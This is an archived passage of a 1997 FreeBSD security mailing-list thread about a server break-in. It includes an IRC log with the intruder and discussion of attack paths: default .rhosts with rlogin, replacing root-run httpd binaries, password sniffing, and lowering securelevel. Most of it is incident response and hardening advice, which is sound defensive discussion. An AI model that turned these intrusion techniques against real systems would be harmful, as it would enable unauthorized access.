I.E. can the "sniffer" sniff past switched networks? > What is the "range" of sniffing? A machine can sniff any packet that passes through the wire going into its ethernet card. Switches, bridges, routers, and smarthubs will all limit the range of sniffing by preventing traffic not destined for a part of the network from going down its wires. For example, if LAN A is connected to LAN B over a switch or a bridge, and both LAN A and LAN B use either 10baseT/100baseT going into a common hub for each LAN or thinnet, then anyone with root access to a machine on LAN A can sniff all packets originating from and destined for LAN A machines, and only those packets. The same applies to LAN B - machines on that network can only sniff the packets from/to other machines on LAN B. However, if one LAN is using 10baseT/100baseT with a smarthub, then machines on that network will only receive their own incoming packets, and will thus not be able to sniff anyone else's packets. This doesn't mean the packets can't be sniffed, though. If the packets cross any insecure network or pass through a router en route to their destination, they can be sniffed there. From owner-freebsd-security Mon Jul 28 16:59:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA13934 for security-outgoing; Mon, 28 Jul 1997 16:59:55 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA13924 for ; Mon, 28 Jul 1997 16:59:51 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA05499; Mon, 28 Jul 1997 16:59:45 -0700 (PDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT." Date: Mon, 28 Jul 1997 16:59:45 -0700 Message-ID: <5496.870134385@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Well, because I connect to the system using telnet ;) Also, this That proves absolutely nothing. You think I can't hack a telnetd to provide multiple "services?" Wake up, Vinnie! :-) Jordan From owner-freebsd-security Mon Jul 28 17:00:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA14062 for security-outgoing; Mon, 28 Jul 1997 17:00:56 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA14050 for ; Mon, 28 Jul 1997 17:00:50 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id RAA05521; Mon, 28 Jul 1997 17:00:48 -0700 (PDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT." Date: Mon, 28 Jul 1997 17:00:48 -0700 Message-ID: <5518.870134448@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > I checked and disabled everything except telnetd in > /etc/inetd.conf and rebooted the machine and then he kicked all of us who > are admins out and shutdown the system. And that's actually pretty funny... One is reminded of the cartoons starring a small cat and the big mouse. :-) Jordan From owner-freebsd-security Mon Jul 28 17:03:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA14165 for security-outgoing; Mon, 28 Jul 1997 17:03:34 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA14157 for ; Mon, 28 Jul 1997 17:03:29 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07160; Mon, 28 Jul 1997 17:03:20 -0700 (PDT) Date: Mon, 28 Jul 1997 17:03:19 -0700 (PDT) From: Vincent Poy To: "Jordan K. Hubbard" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <5496.870134385@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)> Well, because I connect to the system using telnet ;) Also, this =) =)That proves absolutely nothing. You think I can't hack a telnetd to =)provide multiple "services?" Wake up, Vinnie! :-) Ofcourse you could but you're not in the same type of hacking business this guy is in. This is a log of a irc chat session. >From johnnyu@accessus.net Mon Jul 28 17:01:43 1997 Date: Mon, 28 Jul 1997 18:38:32 -0500 (CDT) From: NoHackMe! To: security@netcom.com Cc: vince@mcestate.com, mario1@primenet.com Subject: Logs (Gaianet.net) Here is a log I just got from talking with theca the hacker! Session Start: Mon Jul 28 18:16:14 1997 [18:16] yeah [18:16] hi [18:16] wasup that was nice of you last night [18:16] what? pasting the root pass all over efnet? yea [18:16] so was icmp pinging me you shouldn't have hacked the machine [18:17] i was nice till that started aside from that the minor ping that you got was nothing you have created a HUGE DOS situation for the entire company [18:17] i'll show you all the pings i got [18:17] 1 sec. I don't care? [18:17] ok You were pinged why? [18:18] why am i causing a dos? [18:18] bring your machines back up well let's see you changed the root passwd handed it out [18:18] Jul 28 02:29:45 soma icmplog: ping from venus.GAIANET.NET [18:18] Jul 28 02:30:19 soma last message repeated 10 times [18:18] Jul 28 02:31:20 soma last message repeated 18 times [18:18] Jul 28 02:32:04 soma last message repeated 64 times [18:18] Jul 28 02:38:52 soma last message repeated 31 times [18:18] Jul 28 02:39:53 soma last message repeated 54 times [18:18] Jul 28 02:40:54 soma last message repeated 60 times [18:18] Jul 28 02:41:37 soma last message repeated 42 times [18:18] i changed the root passwd to 'root' someone changed the inetd.conf and rebooted [18:18] yeah [18:18] i didn't do that so now all the machines are pretty much denying all hosts we don't care to much [18:19] one of the windows lusers who saw my paste as far as we're concerned your the cause of the problem [18:19] umm [18:19] why don't you fix the inetd.conf let's put it like this [18:19] instead of bitching about it that system is admin'd remotely that system is admin'd remotely [18:20] so NO one has physical access to the machine? your actions caused the main unix boxes on the lan not at the present time the owners are out of the country [18:20] so go drive over there or something and boot it up [18:20] i told you the root pass... anything I did to you was in an attempt to thwart your efforts to take control all of my feable efforts failed your a super leet spoof aren't you who's caching your dns [18:22] i'm caching it [18:22] on an authorative ns box i rooted Hmm that neet [18:23] yep That would explain why netcom security can't find you on the portmaster ________________________________________ | TheCa (theca@wil-de7-10.ix.netcom.com) | name : No bodies ever knew... | serv : irc.pacbell.net [18:24] tell netcom to change the !root pass on some of their portmasters [18:24] just to be umm safe [18:25] netcom has no security...it's a joke that's good [18:25] netcom shell security is great [18:25] ppp security == null [18:26] they've got the biggest REAL isp (not including aol, etc)...you think they can keep track or even try to keep track of everyone? [18:26] they have well over half a million users you think they can find you? you think they can find you? Session Close: Mon Jul 28 18:32:07 1997 [18:28] Jul 28 19:28:14 soma pppd[16376]: Modem hangup [18:28] Jul 28 19:28:14 soma pppd[16376]: Connection terminated. [18:28] Jul 28 19:28:14 soma pppd[16376]: Exit. [18:29] *clap clap* [18:29] nice [18:30] i'll see if that netcom acct is still up he probably doesn't have the account (!) The time is now 6:30pm. [18:30] something like "connect S0" or the port they just dumped the entire wilmington port [18:30] ah [18:30] heh [18:30] that's stupid [18:30] now there's no way they'll find me ________________________________________ | TheCa_ (theca@phd-as15s15.erols.com) That's it John basically he admits it and implies he has control over at least one of your portmasters and possibly one of your dns servers. This is a serious security issue for us and should be for you. If you have ANY contacts at erols.com please forward this to them and cc us if you would. John Urschel Gaianet Unix Administrator Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:11:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15090 for security-outgoing; Mon, 28 Jul 1997 17:11:30 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15071 for ; Mon, 28 Jul 1997 17:11:27 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id UAA27068; Mon, 28 Jul 1997 20:09:40 -0400 (EDT) Date: Mon, 28 Jul 1997 20:09:40 -0400 (EDT) From: Brian Buchanan To: Vincent Poy cc: freebsd-security@freebsd.org Subject: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > =)I was under the impression that doing a 'make world' in multiuser mode > =)wasn't optimal. > > I know but when all the admins are remote, it has to be done > multiuser. Is there a way to push the secure level up to 2 and then push > it down when a make world is needed? Uh, that would defeat the purpose of securelevel. It's not supposed to be possible to ever lower it, except when dropping into single-user mode, and even allowing init to do so in that instance is risky IMHO - a few months ago I reported a hole, which I believe was fixed, that made it possible to lower the securelevel by attaching a debugger to init. Even though that's plugged now, it's still possible that there's another way to fool the kernel into thinking that process 1 is requesting that securelevel be lowered. From owner-freebsd-security Mon Jul 28 17:17:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15523 for security-outgoing; Mon, 28 Jul 1997 17:17:30 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15509 for ; Mon, 28 Jul 1997 17:17:15 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA02192; Mon, 28 Jul 1997 20:16:08 GMT Date: Mon, 28 Jul 1997 20:16:08 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Vincent Poy cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Actually if you kill the root httpd the others do die (or are supposed to) ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Vincent Poy wrote: :On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: : :=)httpd and sessiond initially are run as root, before they spawn off into :=)separate processes. If you replace httpd and sessiond with your own code, :=)so that before it changes its uid and forks, you will get a root shell : : That's true too since even if you kill the first httpd, the other :processes don't die. : : :Cheers, :Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ :Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] :GaiaNet Corporation - M & C Estate / / / / | / | __] ] :Beverly Hills, California USA 90210 / / / / / |/ / | __] ] :HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] : : From owner-freebsd-security Mon Jul 28 17:18:17 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15594 for security-outgoing; Mon, 28 Jul 1997 17:18:17 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15585 for ; Mon, 28 Jul 1997 17:18:07 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA02246; Mon, 28 Jul 1997 20:16:53 GMT Date: Mon, 28 Jul 1997 20:16:53 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Vincent Poy cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I have mine set to root-owned and have had no problems. I also made sure my config files were root, otherwise you could change that to run as-root which is just as bad. ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Vincent Poy wrote: :On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: : :=)As long as httpd and sessiond are owned by something other than what cgi :=)scripts run as you're safe, but if they are both nobody, you can replace :=)the binary...We had it happen to us once with v1.2 this is how I know. : : Hmmm, what should the owners be for those files? Since the apache :cgi scripts are owned by root as far as I can remember. : : :Cheers, :Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ :Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] :GaiaNet Corporation - M & C Estate / / / / | / | __] ] :Beverly Hills, California USA 90210 / / / / / |/ / | __] ] :HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] : : From owner-freebsd-security Mon Jul 28 17:20:40 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15816 for security-outgoing; Mon, 28 Jul 1997 17:20:40 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15811 for ; Mon, 28 Jul 1997 17:20:36 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07238; Mon, 28 Jul 1997 17:20:07 -0700 (PDT) Date: Mon, 28 Jul 1997 17:20:07 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)Actually if you kill the root httpd the others do die (or are supposed to) I tried it before but it doesn't die... Only the master ones die. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:21:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15891 for security-outgoing; Mon, 28 Jul 1997 17:21:34 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15880 for ; Mon, 28 Jul 1997 17:21:30 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07251; Mon, 28 Jul 1997 17:21:06 -0700 (PDT) Date: Mon, 28 Jul 1997 17:21:06 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)I have mine set to root-owned and have had no problems. I also made sure =)my config files were root, otherwise you could change that to run as-root =)which is just as bad. Hmm, are they supposed to be in the wheel group or bin like some bins are? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:22:21 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15988 for security-outgoing; Mon, 28 Jul 1997 17:22:21 -0700 (PDT) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.7]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id RAA15978 for ; Mon, 28 Jul 1997 17:22:18 -0700 (PDT) Received: (qmail 23990 invoked from network); 29 Jul 1997 00:22:08 -0000 Received: from geekgirl.mediacity.com (HELO geekgirl) (208.138.36.24) by mail001.mediacity.com with SMTP; 29 Jul 1997 00:22:08 -0000 Date: Mon, 28 Jul 1997 05:15:38 -0800 From: "Nicole H." Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) To: "Nicole H." , Brian Buchanan Cc: security@FreeBSD.ORG X-Mailer: Z-Mail Pro 6.1 (Win32 - 021297), NetManage Inc. X-Face: Dy;P!H@)Go.{^Epw&,}@q4ReQ3iOqFrASM63QjFsK/'XnOO67}+{szQ|oo]]`]/.r,g5lx; w+F^YYL4j Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > What is the range of sniffing? I.E. can the "sniffer" sniff past switched networks? > > What is the "range" of sniffing? > > A machine can sniff any packet that passes through the wire going into its > ethernet card. Switches, bridges, routers, and smarthubs will all limit > the range of sniffing by preventing traffic not destined for a part of the > network from going down its wires. For example, if LAN A is connected to > LAN B over a switch or a bridge, and both LAN A and LAN B use either > 10baseT/100baseT going into a common hub for each LAN or thinnet, then > anyone with root access to a machine on LAN A can sniff all packets > originating from and destined for LAN A machines, and only those packets. > The same applies to LAN B - machines on that network can only sniff the > packets from/to other machines on LAN B. However, if one LAN is using > 10baseT/100baseT with a smarthub, then machines on that network will only > receive their own incoming packets, and will thus not be able to sniff > anyone else's packets. This doesn't mean the packets can't be sniffed, > though. If the packets cross any insecure network or pass through a > router en route to their destination, they can be sniffed there. Thanks! Thats kind of what I thought. Does anyone know however if an Ascend Max unit can be sniffed across. I.E. Can a dial up user sniff everyone else connected to the ethernet that it is plugged into, assuming it is not using bridging. If this is not possible. How do most people tend to sniff a network to get a password since you have to be on the network to sniff for a password.... Thanks again Nicole nicole@mediacity.com |\ __ /| (`\ http://www.mediacity.com Nicole Harrington | o_o |__ ) ) Phone: 415-237-1464 // \\ Pager: 415-301-2482 Systems Administrator ------------------------(((---(((------------------------------------- ******* * ***** What do you mean Spelling Errors? * * * My Modem is Error Correcting! * CAUTION: I'm no doctor, I only tell computers what to do. Nothing in this document should be construed as medical advice. My opinions are subject to the availability of information. I learn new things each day, and so may change my opinions. Courtesy is owed. Respect is earned. Love is given. -- ----------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 17:22:51 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA16047 for security-outgoing; Mon, 28 Jul 1997 17:22:51 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA16036 for ; Mon, 28 Jul 1997 17:22:46 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA22876; Mon, 28 Jul 1997 20:22:21 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA03751; Mon, 28 Jul 1997 20:22:21 -0400 (EDT) To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 03:19:55 PDT." Date: Mon, 28 Jul 1997 20:22:21 -0400 Message-ID: <3749.870135741@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > Saw the user on irc posting the password of earth with the login > name root. Any ideas? Take the machine offline and reinstall the *ENTIRE* thing. You have been root kitted, which allows remote access & hiding of remote access, without any daemons needed to be running. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:27:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA16531 for security-outgoing; Mon, 28 Jul 1997 17:27:46 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA16524 for ; Mon, 28 Jul 1997 17:27:43 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07295; Mon, 28 Jul 1997 17:27:15 -0700 (PDT) Date: Mon, 28 Jul 1997 17:27:15 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Just a update on how the break-in was done after the hacker was confronted on irc. Apparently FreeBSD ships with .rhosts in the root account. Using this and perl5.00401, the user was able to rlogin onto the other machine without using a password. The .rhosts file was unaltered and was the same way FreeBSD installed it originally. The user broke the security of many of Netcom's Livingston Portmasters and was caching the DNS for netcom. Netcom Security wasunable to track down the user until dumping the entire portmaster off. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:31:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA16825 for security-outgoing; Mon, 28 Jul 1997 17:31:00 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA16813; Mon, 28 Jul 1997 17:30:50 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07313; Mon, 28 Jul 1997 17:30:45 -0700 (PDT) Date: Mon, 28 Jul 1997 17:30:44 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <3749.870135741@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> Saw the user on irc posting the password of earth with the login =)> name root. Any ideas? =) =)Take the machine offline and reinstall the *ENTIRE* thing. You have =)been root kitted, which allows remote access & hiding of remote =)access, without any daemons needed to be running. Machines are offline already. The hacker confronted us and said that it was the default .rhosts file that came in the FreeBSD root account and he used perl5.00401 which had a security hole and then used rlogin to login to another machine without the password. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:31:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA16848 for security-outgoing; Mon, 28 Jul 1997 17:31:10 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA16821 for ; Mon, 28 Jul 1997 17:30:57 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA24556; Mon, 28 Jul 1997 20:30:56 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA06591; Mon, 28 Jul 1997 20:30:55 -0400 (EDT) To: "Jonathan A. Zdziarski" cc: security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 15:54:26 -0000." Date: Mon, 28 Jul 1997 20:30:55 -0400 Message-ID: <6589.870136255@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk "Jonathan A. Zdziarski" wrote in message ID : > I'm a little paranoid, as somebody hacked our syste about a month ago and > said he would do it again. Where is the source code for /bin/login? I've > checked /usr/src, the only thing I find is > /usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but > that doesn't seem right. /usr/src/usr.bin/login Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:33:15 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17044 for security-outgoing; Mon, 28 Jul 1997 17:33:15 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17036 for ; Mon, 28 Jul 1997 17:33:13 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id UAA27116; Mon, 28 Jul 1997 20:33:11 -0400 (EDT) Date: Mon, 28 Jul 1997 20:33:11 -0400 (EDT) From: Brian Buchanan To: "Nicole H." cc: security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Thats kind of what I thought. Does anyone know however if an Ascend Max unit can be sniffed across. I.E. Can > a dial up user sniff everyone else connected to the ethernet that it is plugged into, assuming it is not > using bridging. Almost certainly not. I'm assuming the unit is a terminal server, and in that case it acts as a gateway between the dialup connection and the local network. Sending all network traffic over the dialup line would very quickly saturate it. > > If this is not possible. How do most people tend to sniff a network to get a password since you have to be on > the network to sniff for a password.... Once you've compromised root on one system on a network, you can sniff anything that passes past or through that machine. From there, it's possible to sniff out passwords to other machines on that network, or passwords to remote machines that were transmitted over the local network. Any kind of "public" network is especially vulnerable to this kind of attack. Someone could use the bug of the week to get root privilages on a UNIX or NT workstation and sniff the network its connected to for people sending passwords to remote machines. If someone sends a root password, the attack can spread to that machine and then to its entire network. From owner-freebsd-security Mon Jul 28 17:34:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17226 for security-outgoing; Mon, 28 Jul 1997 17:34:33 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17187 for ; Mon, 28 Jul 1997 17:34:29 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA25277; Mon, 28 Jul 1997 20:34:10 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA06957; Mon, 28 Jul 1997 20:34:10 -0400 (EDT) To: "Nicole H." cc: Robert Watson , Vincent Poy , "[Mario1-]" , JbHunt , security@FreeBSD.ORG, Tomasz Dudziak From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 02:22:24 -0800." Date: Mon, 28 Jul 1997 20:34:09 -0400 Message-ID: <6954.870136449@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk "Nicole H." wrote in message ID : > Does anyone know of a good way to detect people "sniffing" on the > network? IE a program that will detect a machine running in > promiscuous mode? There is no way to detect that from outside the machine ... after all, its just listening to all the packets that go past. FreeBSD 2.2 and later log a message to console when an interface goes into promiscuous mode. The *REAL* answer is to remove BPF from all machines, and make sure they stay removed. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:36:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17387 for security-outgoing; Mon, 28 Jul 1997 17:36:11 -0700 